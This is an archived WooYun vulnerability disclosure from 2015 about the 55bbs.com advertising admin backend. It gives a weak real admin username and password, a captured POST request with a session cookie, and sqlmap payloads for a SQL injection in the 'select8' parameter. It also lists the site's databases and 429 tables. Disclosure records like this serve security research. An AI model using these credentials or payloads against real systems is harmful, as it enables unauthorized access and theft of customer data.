乌云(WooYun.org)历史漏洞查询---http://wy.zone.ci/
乌云 Drops 文章在线浏览--------http://drop.zone.ci/
2015-07-23: 细节已通知厂商并且等待厂商处理中 2015-07-28: 厂商已经主动忽略漏洞,细节向公众公开
RT
后台地址
http://admin.55bbs.com/login.php
弱口令 lijun lijun123直接进去后台一个搜索处抓包
POST /adpublish/customer_list.php HTTP/1.1Host: article.55bbs.comUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:38.0) Gecko/20100101 Firefox/38.0Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8Accept-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3Accept-Encoding: gzip, deflateReferer: http://article.55bbs.com/adpublish/customer_list.phpCookie: ID=320; S_uid=lijun; S_checkcode=c7c0d53884ee86346f5dc0d9d27b7e5e; S_power_limit=NConnection: keep-aliveContent-Type: application/x-www-form-urlencodedContent-Length: 54text=&workname=nixiaolei&select8=1&button=%B2%E9%D1%AF
经测试参数select8为注入点 。直接丢sqlmap
Parameter: select8 (POST) Type: boolean-based blind Title: AND boolean-based blind - WHERE or HAVING clause Payload: text=&workname=nixiaolei&select8=1 AND 7097=7097&button=%B2%E9%D1%AF Type: UNION query Title: MySQL UNION query (33) - 11 columns Payload: text=&workname=nixiaolei&select8=1 UNION ALL SELECT 33,33,33,33,CONCAT(0x716b627a71,0x48654a5270764e595443,0x717a786a71),33,33,33,33,33,33#&button=%B2%E9%D1%AF---[16:37:24] [INFO] the back-end DBMS is MySQLweb application technology: Apacheback-end DBMS: MySQL 5
有3个库。
available databases [3]:[*] Admanger[*] information_schema[*] test
表挺多的,有429张。其中也有一些商家的重要信息。
Database: Admanger[429 tables]+-----------------------------+| 55_bao10_3phplog || 55_bao10_7_4 || 55_bao10_accesslog || 55_bao10 || tbl_chuangyi1-2 || activity || activity_0 || activity_122 || activity_140 || activity_144 || activity_145 || activity_146 || activity_163 || activity_164 || activity_165 || activity_166 || activity_167 || activity_168 || activity_169 || activity_170 || activity_171 || activity_172 || activity_173 || activity_178 || activity_180 || activity_181 || activity_183 || activity_184 || activity_185 || activity_186 || activity_187 || activity_189 || activity_190 || activity_191 || activity_192 || activity_193 || activity_194 || activity_196 || activity_197 || activity_198 || activity_199 || activity_200 || activity_201 || activity_202 || activity_203 || activity_204 || activity_205 || activity_206 || activity_207 || activity_208 || activity_210 || activity_211 || activity_212 || activity_213 || activity_214 || activity_215 || activity_216 || activity_217 || activity_218 || activity_219 || activity_220 || activity_221 || activity_222 || activity_223 || activity_225 || activity_226 || activity_227 || activity_228 || activity_229 || activity_230 || activity_231 || activity_232 || activity_233 || activity_237 || activity_238 || activity_239 || activity_240 || activity_241 || activity_242 || activity_243 || activity_244 || activity_245 || activity_246 || activity_247 || activity_248 || activity_249 || activity_250 || activity_251 || activity_252 || activity_253 || activity_254 || activity_255 || activity_256 || activity_257 || activity_258 || activity_259 || activity_260 || activity_261 || activity_262 || activity_263 || activity_264 || activity_265 || activity_266 || activity_267 || activity_268 || activity_269 || activity_270 || activity_271 || activity_272 || activity_273 || activity_274 || activity_275 || activity_276 || activity_277 || activity_278 || activity_279 || activity_280 || activity_281 || activity_282 || activity_283 || activity_284 || activity_285 || activity_286 || activity_287 || activity_288 || activity_289 || activity_290 || activity_291 || activity_292 || activity_292_vote || activity_293 || activity_294 || activity_295 || activity_296 || activity_297 || activity_298 || activity_299 || activity_300 || activity_301 || activity_302 || activity_303 || activity_304 || activity_305 || activity_306 || activity_307 || activity_308 || activity_309 || activity_310 || activity_311 || activity_312 || activity_313 || activity_314 || activity_315 || activity_316 || activity_317 || activity_318 || activity_319 || activity_320 || activity_321 || activity_322 || activity_323 || activity_324 || activity_325 || activity_326 || activity_327 || activity_328 || activity_329 || activity_330 || activity_331 || activity_332 || activity_333 || activity_334 || activity_335 || activity_336 || activity_337 || activity_338 || activity_339 || activity_340 || activity_344 || activity_345 || activity_346 || activity_347 || activity_348 || activity_349 || activity_350 || activity_351 || activity_352 || activity_353 || activity_354 || activity_355 || activity_356 || activity_357 || activity_358 || activity_359 || activity_360 || activity_361 || activity_362 || activity_363 || activity_364 || activity_365 || activity_366 || activity_368 || activity_369 || activity_371 || activity_372 || activity_373 || activity_374 || activity_375 || activity_376 || activity_377 || activity_378 || activity_379 || activity_380 || activity_381 || activity_382 || activity_383 || activity_384 || activity_385 || activity_386 || activity_387 || activity_388 || activity_389 || activity_390 || activity_391 || activity_392 || activity_393 || activity_394 || activity_395 || activity_396 || activity_397 || activity_398 || activity_399 || activity_400 || activity_401 || activity_402 || activity_403 || activity_404 || activity_405 || activity_406 || activity_407 || activity_408 || activity_409 || activity_410 || activity_411 || activity_412 || activity_413 || activity_414 || activity_415 || activity_416 || activity_417 || activity_418 || activity_419 || activity_420 || activity_421 || activity_422 || activity_423 || activity_424 || activity_425 || activity_426 || activity_427 || activity_428 || activity_429 || activity_430 || activity_431 || activity_432 || activity_433 || activity_434 || activity_435 || activity_436 || activity_437 || activity_438 || activity_439 || activity_440 || activity_440_secode || activity_441 || activity_442 || activity_450 || activity_451 || activity_452 || activity_453 || activity_454 || activity_455 || activity_456 || activity_457 || activity_458 || activity_459 || activity_460 || activity_461 || activity_462 || activity_463 || activity_464 || activity_465 || activity_466 || activity_467 || activity_468 || activity_469 || activity_470 || activity_471 || activity_472 || activity_473 || activity_474 || activity_475 || activity_476 || activity_477 || activity_478 || activity_479 || activity_480 || activity_481 || activity_482 || activity_483 || activity_484 || activity_485 || activity_486 || activity_487 || activity_488 || activity_489 || activity_490 || activity_491 || activity_492 || activity_493 || activity_494 || activity_495 || activity_498 || activity_499 || activity_500 || activity_501 || activity_502 || activity_503 || activity_504 || activity_505 || activity_506 || activity_507 || activity_508 || activity_509 || activity_510 || activity_511 || activity_512 || activity_513 || activity_514 || activity_515 || activity_516 || activity_517 || activity_518 || activity_519 || activity_520 || activity_521 || activity_522 || activity_523 || activity_524 || activity_525 || activity_526 || activity_527 || activity_528 || activity_529 || activity_530 || activity_531 || activity_532 || activity_533 || activity_534 || activity_535 || activity_536 || activity_537 || activity_538 || activity_539 || activity_540 || activity_541 || activity_542 || activity_543 || activity_544 || activity_egg || activity_panting || activity_photo_396 || activity_photo_399 || bride_album || bride_photos || bride_vote || bwxn || bwxn_code || eanhk_sn || info_param || ip_tj || jiehun_act || m_activities || m_albums || m_ip_logs || m_photos || mnls_userinfo || param_dict || qmshangwang || qmshangwang_tids || qmshangwang_users || saiban_photo || saiban_userinfo || sunny_396 || sunny_vote || supe_categories || tbl_adclass || tbl_adgrand_subclass || tbl_admodus || tbl_adplan || tbl_adplan_log || tbl_adplan_tmp || tbl_adsite || tbl_adsite_100416 || tbl_adsite_cdbADV || tbl_adsite_cdbADV_010416 || tbl_adsubclass || tbl_chuangyi || tbl_chuangyi2 || tbl_classes_fid || tbl_corp_rel || tbl_customer_info || tbl_div || tbl_module || tbl_publish || tbl_publish2 || tbl_publish2_bak || tbl_publish2_bak_100127_zzq || tbl_publish_bak20100127 || tbl_relation || tbl_solution || tbl_solution_log || tbl_tid_fid || tbl_tongji || tbl_tongji_hour || user_20101002 || userinfo || wizard_userinfo || wizard_vote |+-----------------------------+
-。-
危害等级:无影响厂商忽略
忽略时间:2015-07-28 10:18
漏洞Rank:15 (WooYun评价)
暂无
